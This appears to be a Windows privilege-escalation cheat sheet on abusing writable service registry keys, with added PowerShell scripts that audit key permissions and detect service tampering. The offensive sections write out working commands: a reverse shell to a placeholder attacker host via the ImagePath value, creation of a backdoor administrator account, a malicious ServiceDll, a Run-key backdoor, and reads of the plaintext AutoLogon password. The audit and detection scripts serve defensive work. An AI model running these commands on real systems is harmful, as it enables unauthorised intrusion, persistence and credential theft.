Overview
Each Windows service has a registry key under HKLM\SYSTEM\CurrentControlSet\Services\. If you have write access to a service’s registry key, you can change its binary path, add parameters, or modify its configuration to execute arbitrary code as SYSTEM.
Find Writable Service Registry Keys
accesschk
accesschk.exe /accepteula -kvuqsw "Everyone" HKLM\SYSTEM\CurrentControlSet\Services
accesschk.exe /accepteula -kvuqsw "Users" HKLM\SYSTEM\CurrentControlSet\Services
accesschk.exe /accepteula -kvuqsw "Authenticated Users" HKLM\SYSTEM\CurrentControlSet\Services
Look for KEY_ALL_ACCESS or KEY_SET_VALUE.
PowerShell
Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Services" | ForEach-Object {
    # Keys the current user cannot read the ACL of are skipped instead of raising an error
    $acl = Get-Acl $_.PSPath -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    # WriteKey and CreateSubKey are included so the "AppendData" case further down is reported too
    $acl.Access | Where-Object { $_.IdentityReference -match "Users|Everyone|Authenticated" -and $_.RegistryRights -match "SetValue|CreateSubKey|WriteKey|FullControl" } | ForEach-Object {
        Write-Output "$($_.IdentityReference) -> $($acl.PSPath)"
    }
}
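The following audit script is an added example, not part of the original page. It lists every ACE on a service key (and on its Parameters subkey, where ServiceDll lives) that grants a low-privilege principal a right able to change the service definition. Beyond the one-liner above it also catches CreateSubKey (the AppendData case), WriteDAC/WriteOwner and unmapped generic rights, and includes a remediation helper that removes an explicit write ACE. The principal list and the right mask are this example's own choices.

```powershell
# Added audit example, not from the original page. Run elevated.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Test-ServiceWriteRight {
    param([Parameter(Mandatory)][int]$Rights)
    # Specific registry rights that let a caller alter the key or its ACL
    $SetValue = 0x2; $CreateSubKey = 0x4; $WriteDac = 0x40000; $WriteOwner = 0x80000
    # Generic rights, which show up as raw numbers when an ACE was never mapped
    $GenericWrite = 0x40000000; $GenericAll = 0x10000000
    $mask = $SetValue -bor $CreateSubKey -bor $WriteDac -bor $WriteOwner -bor $GenericWrite -bor $GenericAll
    return (($Rights -band $mask) -ne 0)
}

function Get-WritableServiceKey {
    param([string[]]$Principal = $LowPrivPrincipals)
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($svc in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        # Check the service key and, when present, its Parameters subkey (ServiceDll)
        $keys = @($svc.PSPath)
        $params = $svc.PSPath + '\Parameters'
        if (Test-Path -LiteralPath $params) { $keys += $params }
        foreach ($key in $keys) {
            $acl = Get-Acl -LiteralPath $key -ErrorAction SilentlyContinue
            if (-not $acl) { continue }     # no READ_CONTROL on this key
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($Principal -notcontains $ace.IdentityReference.Value) { continue }
                if (-not (Test-ServiceWriteRight ([int]$ace.RegistryRights))) { continue }
                [pscustomobject]@{
                    Service   = $svc.PSChildName
                    Key       = $key -replace '^.*Registry::HKEY_LOCAL_MACHINE', 'HKLM:'
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

function Remove-ServiceWriteAce {
    # Remediation: drop explicit (non-inherited) write ACEs for one principal on one key.
    # Inherited ACEs must be fixed on the parent key or by breaking inheritance first.
    param(
        [Parameter(Mandatory)][string]$Key,
        [Parameter(Mandatory)][string]$Principal
    )
    $acl = Get-Acl -LiteralPath $Key
    foreach ($ace in @($acl.Access)) {
        if ($ace.IdentityReference.Value -eq $Principal -and -not $ace.IsInherited -and
            (Test-ServiceWriteRight ([int]$ace.RegistryRights))) {
            [void]$acl.RemoveAccessRule($ace)
        }
    }
    Set-Acl -LiteralPath $Key -AclObject $acl
}

# Findings with Inherited = True point at the ACL of the parent Services key, not the service itself
Get-WritableServiceKey | Format-Table -AutoSize
```

A finding is worth triaging even when only CreateSubKey is granted: a principal that can create `Parameters` under a service key that lacks one can introduce a ServiceDll value the service host will honour. `Remove-ServiceWriteAce -Key 'HKLM:\SYSTEM\CurrentControlSet\Services\<Name>' -Principal 'BUILTIN\Users'` fixes a single explicit grant; inherited grants need the parent key's ACL corrected.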
Modify ImagePath
If writable, change the service binary:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
Restart service:
sc stop VulnService
sc start VulnService
Add Admin User via ImagePath
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v ImagePath /t REG_EXPAND_SZ /d "cmd.exe /c net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" /f
sc stop VulnService
sc start VulnService
Service DLL
Some services load a DLL specified in the registry:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\Parameters" /v ServiceDll
If ServiceDll key is writable:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\Temp\evil.dll" /f
AppendData Permission
If you have AppendData but not SetValue:
# Can add new subkeys but not modify existing values
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService\NewSubKey" /v Exploit /t REG_SZ /d "payload" /f
Limited, but can sometimes be chained with other techniques.
Startup Type
Change service to auto-start:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnService" /v Start /t REG_DWORD /d 2 /f
| Value | Meaning |
|---|---|
| 2 | Automatic |
| 3 | Manual |
| 4 | Disabled |
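To detect the changes described in the ImagePath, ServiceDll and Start sections above, the following added example (not from the original page) snapshots those three values for every service, stores a baseline, and on later runs reports drift together with values that match a simple suspicious-command pattern. The baseline file location and the pattern are this example's own choices.

```powershell
# Added detection example, not from the original page. Run elevated on a known-good host first.
$SuspiciousPattern = 'cmd\.exe|powershell|net\s+user|net\s+localgroup|\\Temp\\|\\Users\\|\\ProgramData\\'

function Get-ServiceConfigSnapshot {
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($svc in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        $props = Get-ItemProperty -LiteralPath $svc.PSPath -ErrorAction SilentlyContinue
        if (-not $props.ImagePath) { continue }   # service groups and some drivers carry no binary
        $dll = $null
        $paramsKey = $svc.PSPath + '\Parameters'
        if (Test-Path -LiteralPath $paramsKey) {
            $dll = (Get-ItemProperty -LiteralPath $paramsKey -ErrorAction SilentlyContinue).ServiceDll
        }
        [pscustomobject]@{
            Service    = $svc.PSChildName
            ImagePath  = [Environment]::ExpandEnvironmentVariables([string]$props.ImagePath)
            ServiceDll = if ($dll) { [Environment]::ExpandEnvironmentVariables([string]$dll) } else { $null }
            Start      = $props.Start    # 2 = Automatic, 3 = Manual, 4 = Disabled
        }
    }
}

function Compare-ServiceConfig {
    param([Parameter(Mandatory)][string]$BaselinePath)
    $current = Get-ServiceConfigSnapshot
    if (-not (Test-Path -LiteralPath $BaselinePath)) {
        # First run: persist the snapshot and report nothing
        $current | Export-Clixml -LiteralPath $BaselinePath
        Write-Output "Baseline written to $BaselinePath"
        return
    }
    $baseline = @{}
    foreach ($b in Import-Clixml -LiteralPath $BaselinePath) { $baseline[$b.Service] = $b }
    foreach ($c in $current) {
        $b = $baseline[$c.Service]
        $reasons = @()
        if (-not $b) {
            $reasons += 'new service'
        } else {
            foreach ($field in 'ImagePath', 'ServiceDll', 'Start') {
                if ([string]$c.$field -ne [string]$b.$field) {
                    $reasons += "$field changed from '$($b.$field)'"
                }
            }
        }
        # Flag command-interpreter or user-writable-directory targets regardless of baseline state
        foreach ($v in $c.ImagePath, $c.ServiceDll) {
            if ($v -and $v -match $SuspiciousPattern) { $reasons += "suspicious value '$v'" }
        }
        if ($reasons) {
            [pscustomobject]@{
                Service   = $c.Service
                ImagePath = $c.ImagePath
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

Compare-ServiceConfig -BaselinePath "$env:ProgramData\service-baseline.xml" | Format-Table -AutoSize
```

Point-in-time comparison catches the end state but not the actor. For attribution, place a SACL on the Services key (Audit Registry subcategory) so that value writes produce Security event 4657, which records the account and the old and new value.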
Other Interesting Registry Locations
Run Keys (Persistence)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
If writable:
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\shell.exe" /f
Winlogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
AutoLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
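The Run keys and Winlogon values above are worth reviewing from the defender's side as well. The following added example (not from the original page) lists Run and RunOnce entries whose target executable, or the directory it would be created in, is writable by a low-privilege principal, and reports whether Winlogon holds a plaintext DefaultPassword without printing it. The principal list and the path heuristics are this example's own choices.

```powershell
# Added audit example, not from the original page.
$LowPrivPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$MetaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-CommandExecutable {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Heuristic: a quoted leading path, otherwise the first whitespace-delimited token
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd -match '^"([^"]+)"') { return $Matches[1] }
    return ($cmd -split '\s+')[0]
}

function Test-LowPrivWritableTarget {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) {
        # Missing target: whoever can create a file in its directory controls what runs
        $Path = Split-Path -Parent $Path
        if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return $false }
    }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    # WriteData/CreateFile (0x2) is part of Write, Modify and FullControl; the other two bits are GENERIC_WRITE/GENERIC_ALL
    $mask = 0x2 -bor 0x40000000 -bor 0x10000000
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $LowPrivPrincipals -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights -band $mask) -ne 0)) { return $true }
    }
    return $false
}

function Get-RunKeyFinding {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $props = Get-ItemProperty -LiteralPath $key
        foreach ($p in $props.PSObject.Properties) {
            if ($MetaProps -contains $p.Name) { continue }   # provider metadata, not a registry value
            $exe = Get-CommandExecutable -CommandLine ([string]$p.Value)
            [pscustomobject]@{
                Key             = $key
                Name            = $p.Name
                Executable      = $exe
                LowPrivWritable = Test-LowPrivWritableTarget -Path $exe
            }
        }
    }
}

function Get-AutoLogonFinding {
    $wl = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    [pscustomobject]@{
        AutoAdminLogon       = $wl.AutoAdminLogon
        DefaultUserName      = $wl.DefaultUserName
        PlaintextPasswordSet = -not [string]::IsNullOrEmpty($wl.DefaultPassword)   # value itself is not emitted
    }
}

Get-RunKeyFinding | Where-Object LowPrivWritable | Format-Table -AutoSize
Get-AutoLogonFinding
```

A Run entry whose target is writable by Users is a persistence and privilege-escalation path in one, and the fix is on the file system ACL rather than in the registry. A plaintext DefaultPassword should be replaced: the Sysinternals Autologon tool stores the password as an LSA secret instead of a readable registry value, which keeps it out of `reg query`.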
Quick Reference
| Target | Registry Path |
|---|---|
| Service binary | HKLM\...\Services\<Name>\ImagePath |
| Service DLL | HKLM\...\Services\<Name>\Parameters\ServiceDll |
| Startup type | HKLM\...\Services\<Name>\Start |
| Run keys | HKLM\...\CurrentVersion\Run |
| AutoLogon creds | HKLM\...\Winlogon\DefaultPassword |